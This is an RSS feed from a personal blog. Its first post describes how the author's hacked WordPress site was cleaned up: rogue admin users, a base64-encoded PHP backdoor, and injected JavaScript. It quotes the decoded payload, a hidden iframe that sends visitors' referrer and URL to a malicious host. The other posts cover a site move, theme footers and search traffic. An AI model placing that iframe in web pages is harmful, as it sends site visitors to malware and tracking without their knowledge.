<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Dhivael/Anne's Hyperactive Blog &#187; Web&#8230; thingies</title>
	<atom:link href="http://blog.annelions.com/category/web-thingies/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.annelions.com</link>
	<description>Not just another WordPress weblog - it's hyperactive!</description>
	<lastBuildDate>Fri, 20 Aug 2010 02:35:00 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
		<item>
		<title>I&#8217;ve been hacked! (But I fixed it)</title>
		<link>http://blog.annelions.com/2010/02/11/ive-been-hacked-but-i-fixed-it.html</link>
		<comments>http://blog.annelions.com/2010/02/11/ive-been-hacked-but-i-fixed-it.html#comments</comments>
		<pubDate>Thu, 11 Feb 2010 20:28:17 +0000</pubDate>
		<dc:creator>annelions</dc:creator>
				<category><![CDATA[Web... thingies]]></category>

		<guid isPermaLink="false">http://blog.annelions.com/2010/02/11/ive-been-hacked-but-i-fixed-it.html</guid>
		<description><![CDATA[(I think.) I had reason to go searching for something in my blog this morning. In the process, I found out my blog had been hacked to redirect people away. Guess that&#8217;s what I get for not paying attention. I could&#8217;ve sworn that I&#8217;d upgraded&#8230; but apparently not. Of course, I freaked. Some digging around [...]]]></description>
			<content:encoded><![CDATA[<p>(I think.)</p>
<p>I had reason to go searching for something in my blog this morning. In the process, I found out my blog had been hacked to redirect people away. Guess that&#8217;s what I get for not paying attention. I could&#8217;ve sworn that I&#8217;d upgraded&#8230; but apparently not.</p>
<p>Of course, I freaked.</p>
<p>Some digging around produced a <a href="http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/" target="_blank">helpful link</a> or <a href="http://ocaoimh.ie/did-your-wordpress-site-get-hacked/" target="_blank">two</a> or <a href="http://codex.wordpress.org/FAQ_My_site_was_hacked" target="_blank">three</a> regarding what to do.</p>
<p>After reading through the instructions, I prepared for hours worth of removing junk from my site. After downloading the entire blog as well as a backup of my SQL DB, I found&#8230; nothing. Well, almost nothing. The hack consisted of:</p>
<ol>
<li>6 or 7 unauthorized users, one of which was an admin.</li>
<li>Some obfuscated Javascript in the header.php of my theme.</li>
<li>A randomly named PHP file in my upload directory.</li>
</ol>
<p>Things were, clearly, better than I thought. Despite the dire predictions of others, this was fairly simple to fix.</p>
<ol>
<li>Upgrade! I thought I had before, obviously not. But I upgraded now.</li>
<li>Delete those unauthorized users.</li>
<li>Delete the &#8220;845530.php&#8221; file in my upload directory.</li>
<li>Delete the offending Javascript in my header.php file.</li>
</ol>
<p>After doing this, I was left with an obfuscated PHP file and Javascript. So, of course, I decided to decrypt them.</p>
<p>The PHP file was easy. Two times through base64_decode() produced readable code. The offending file is pretty long, so I&#8217;m not sure <strong><em>precisely</em></strong> what it does, but there are a few interesting points. There are a few lines that seem to allow the hacker to download and email themselves your SQL DB. This is, no doubt, why you&#8217;re advised to change your password after getting hacked. It also likely helps your server function as a &#8220;relay&#8221; station for the Javascript. As such, it&#8217;s absolutely necessary that you find and delete this ASAP.</p>
<p>The Javascript proved a bit trickier. It was encoded differently and it took me awhile to figure out how to get it, and then that was only after help and a nudge in the right direction. It proved to be code that would write the following to your page:</p>
<blockquote><p>&lt;iframe src=&#8217;http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&#8221; encodeURIComponent(document.referrer) &#8220;&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=&#8221;  encodeURIComponent(document.URL) &#8220;&amp;default_keyword=notdefine&#8217; width=1 height=1 border=0 frameborder=0&gt;&lt;/iframe&gt;</p></blockquote>
<p>After Googling for itsallbreaksoft.net, this turned out to be <a href="http://www.theinternetpatrol.com/was-your-site-hacked-redirecting-to-itsallbreaksoftnet-or-paymoneysysteminfo-heres-what-happened/" target="_blank">a known &#8220;bad site&#8221;</a>.</p>
<p>Strangely enough, none of the sites make mention of the obfuscated PHP file, although I&#8217;m fairly certain it&#8217;s all part of the same exploit.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.annelions.com/2010/02/11/ive-been-hacked-but-i-fixed-it.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>AAAH! We&#8217;re all gonna DIE!</title>
		<link>http://blog.annelions.com/2008/09/14/aaah-were-all-gonna-die.html</link>
		<comments>http://blog.annelions.com/2008/09/14/aaah-were-all-gonna-die.html#comments</comments>
		<pubDate>Sun, 14 Sep 2008 10:05:31 +0000</pubDate>
		<dc:creator>annelions</dc:creator>
				<category><![CDATA[Web... thingies]]></category>

		<guid isPermaLink="false">http://blog.annelions.com/?p=780</guid>
		<description><![CDATA[Okay, maybe not really&#8230; But if it wasn&#8217;t enough that I moved my blog to a new address, I&#8217;ve gone and decided to port my old main site over to Joomla. I&#8217;d considered making it WordPress, but WordPress isn&#8217;t quite what I want in this instance. Joomla is a bit unwieldy, but it should be [...]]]></description>
			<content:encoded><![CDATA[<p>Okay, maybe not really&#8230; But if it wasn&#8217;t enough that I moved my blog to a new address, I&#8217;ve gone and decided to port my old main site over to Joomla. I&#8217;d considered making it WordPress, but WordPress isn&#8217;t quite what I want in this instance.</p>
<p>Joomla is a bit unwieldy, but it should be good for a few things I have in mind. Once I figure out how to do them. And after I get everything ported over to it. Shouldn&#8217;t take too long&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.annelions.com/2008/09/14/aaah-were-all-gonna-die.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Oops!</title>
		<link>http://blog.annelions.com/2008/09/10/oops.html</link>
		<comments>http://blog.annelions.com/2008/09/10/oops.html#comments</comments>
		<pubDate>Wed, 10 Sep 2008 15:49:20 +0000</pubDate>
		<dc:creator>annelions</dc:creator>
				<category><![CDATA[Web... thingies]]></category>

		<guid isPermaLink="false">http://blog.annelions.com/?p=776</guid>
		<description><![CDATA[In my bid to redirect everyone here from the old /blog address, I didn&#8217;t realize I had forgotten to redirect the main blog page as well. At least, until someone pointed out that my blog was &#8216;gone&#8217;. So I&#8217;ve gotten that fixed and I think that the move is officially complete now.]]></description>
			<content:encoded><![CDATA[<p>In my bid to redirect everyone here from the old /blog address, I didn&#8217;t realize I had forgotten to redirect the <em>main</em> blog page as well. At least, until someone pointed out that my blog was &#8216;gone&#8217;. So I&#8217;ve gotten that fixed and I think that the move is officially complete now.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.annelions.com/2008/09/10/oops.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Move in progress&#8230;</title>
		<link>http://blog.annelions.com/2008/08/24/move-in-progress.html</link>
		<comments>http://blog.annelions.com/2008/08/24/move-in-progress.html#comments</comments>
		<pubDate>Mon, 25 Aug 2008 06:17:40 +0000</pubDate>
		<dc:creator>annelions</dc:creator>
				<category><![CDATA[Web... thingies]]></category>

		<guid isPermaLink="false">http://blog.annelions.com/?p=745</guid>
		<description><![CDATA[So I&#8217;ve moved everything over to blog.annelions.com, as you can probably see if you&#8217;re reading this. Some images and stuff still point to the old blog address and I&#8217;m working now on correcting them. Shouldn&#8217;t notice anything major right now, though, except a few missing images. Working on getting that all fixed ASAP.]]></description>
			<content:encoded><![CDATA[<p>So I&#8217;ve moved everything over to blog.annelions.com, as you can probably see if you&#8217;re reading this. Some images and stuff still point to the old blog address and I&#8217;m working now on correcting them. Shouldn&#8217;t notice anything major right now, though, except a few missing images. Working on getting that all fixed ASAP.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.annelions.com/2008/08/24/move-in-progress.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SO tired of encrypted footers&#8230;</title>
		<link>http://blog.annelions.com/2008/08/24/so-tired-of-encrypted-footers.html</link>
		<comments>http://blog.annelions.com/2008/08/24/so-tired-of-encrypted-footers.html#comments</comments>
		<pubDate>Sun, 24 Aug 2008 13:27:23 +0000</pubDate>
		<dc:creator>annelions</dc:creator>
				<category><![CDATA[Web... thingies]]></category>

		<guid isPermaLink="false">http://blog.annelions.com/2008/08/24/so-tired-of-encrypted-footers.html</guid>
		<description><![CDATA[I am so tired of searching for a WordPress template and finding one that is perfect only to download it and discover that the stupid thing is encrypted somehow. The footer links invariably end up being: Irrelevant. I highly doubt that a business card company actually designed the theme. Nor does my site have anything [...]]]></description>
			<content:encoded><![CDATA[<p>I am so tired of searching for a WordPress template and finding one that is <em>perfect</em> only to download it and discover that the stupid thing is encrypted somehow. The footer links invariably end up being:</p>
<ul>
<li>Irrelevant. I highly doubt that a business card company actually designed the theme. Nor does my site have anything to do with business cards (so it&#8217;s not going to help their PR by <strong>that</strong> much, as far as I know.</li>
<li>Outdated. The sites are completely dead and have been for some time.</li>
<li>Objectionable. Gambling and &#8216;adult&#8217; sites. These are somewhat rarer, but I still have no wish to link to either.</li>
</ul>
<p>I&#8217;m usually willing to leave in a link if the footer&#8217;s not obfuscated in some way, but otherwise I either will fix it (unencrypt and remove the links) or simply not use the template. I know a lot of other people are getting tired of this and removing the encryption from their templates as well.</p>
<p>So, if you&#8217;re thinking of buying &#8216;advertising&#8217; in the footer of a WP template (&#8216;sponsoring&#8217; a template), you&#8217;re just wasting your money. If you&#8217;re selling &#8216;advertising&#8217;, you&#8217;re scum.</p>
<p>I have no problems paying $5-10 for a decent template, which would give the creators about the same amount of money as they get now. I have no wish, however, to be unable to edit my template easily and to have stupid links at the bottom.S</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.annelions.com/2008/08/24/so-tired-of-encrypted-footers.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Looking for a (possible) three-fold increase in website visitors?</title>
		<link>http://blog.annelions.com/2008/08/16/looking-for-a-possible-three-fold-increase-in-website-visitors.html</link>
		<comments>http://blog.annelions.com/2008/08/16/looking-for-a-possible-three-fold-increase-in-website-visitors.html#comments</comments>
		<pubDate>Sat, 16 Aug 2008 15:32:17 +0000</pubDate>
		<dc:creator>annelions</dc:creator>
				<category><![CDATA[Web... thingies]]></category>

		<guid isPermaLink="false">http://blog.annelions.com/2008/08/16/looking-for-a-possible-three-fold-increase-in-website-visitors.html</guid>
		<description><![CDATA[Install a blog. Seriously. You don&#8217;t even have to update it daily. Google and other search engines honestly do not care that much. How do I know this? I have a certain domain that I&#8217;ve held for&#8230; hmmm&#8230; about 6 years, give or take. If you go look at Archive.org, it&#8217;s gone through many iterations. [...]]]></description>
			<content:encoded><![CDATA[<p>Install a blog. Seriously.</p>
<p>You don&#8217;t even have to update it daily. Google and other search engines honestly do not care that much. How do I know this?</p>
<p>I have a <a href="http://www.startreklover.com" target="_blank">certain domain</a> that I&#8217;ve held for&#8230; hmmm&#8230; about 6 years, give or take.  If you go look at Archive.org, it&#8217;s gone through many iterations. Some are now rather embarrassing; for awhile the site was hosted for free on &#8216;Marhost&#8217;, though I don&#8217;t remember details. &#8216;Wigloo&#8217; and <a href="http://startreklover.tripod.com" target="_blank">Tripod</a> have also been used before finally moving to a &#8216;semi-paid&#8217; host and then finally here.</p>
<p>Anyway, I finally moved it to the current host about 2 years ago. Since then, it didn&#8217;t get much traffic. Some, but not much. 10-20 visitors a MONTH average, 60 for a high point. So not much traffic at all. At least, not until I decided to scrap the way things were and install WordPress for my own ease of updating. I added a few posts and then forgot about it, having other important things come up.</p>
<p>That was 6 months ago. I remembered a few days ago to check the webstats and found that I&#8217;ve been getting 130-180 visitors a month since then. This may seem like very little, but remember&#8230; I did NOTHING with the site for six months. Zip. Zilch. No new content. <strong><em>NOTHING</em></strong>. And yet I&#8217;ve seen a 2-3x increase in visitors.</p>
<p>When my page was pure HTML, I&#8217;d get a handful of searches for various keywords; maybe 10 searches a month. Nothing important, mostly just rarer stuff that&#8217;s hard to find elsewhere. Now that I have WordPress installed, I have been getting a lot more hits for more general words. Apparently, I rank somewhat highly somewhere for the word &#8216;boldly&#8217; (and other generic words). Even if it&#8217;s buried on the third or fourth page of the search, that&#8217;s pretty darn impressive because:</p>
<ol>
<li>I&#8217;ve done no search engine optimization.  Beyond installing WordPress&#8217;s permalinks, I&#8217;ve done nothing to try to get search engines to visit.</li>
<li>Even if I had done SEO, &#8216;boldly&#8217; is not a keyword/phrase I would have chosen. Google reports about 9 <em>million</em> results for &#8216;boldly&#8217;. And I&#8217;m getting hits for it? How cool is that!</li>
<li>I&#8217;ve done absolutely no advertising or posting of links for this site anywhere in the past 6 months.</li>
<li>The blog had been sitting dormant for nearly six months. No updates, not even automatic ones. Yet I&#8217;m still getting way more traffic with it than I ever got with plain HTML pages.</li>
</ol>
<p>To me, the evidence is irrefutable: search engines <strong>love</strong> blogs. Before, I was skeptical that it&#8217;d do much. But it&#8217;s hard to deny 18 months of stats as a plain, irregularly updated, HTML site + 6 months as a never-updated blog.</p>
<p>Now, while you may not see as dramatic an increase as 2-3x your current traffic, it still seems worth giving it a shot.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.annelions.com/2008/08/16/looking-for-a-possible-three-fold-increase-in-website-visitors.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

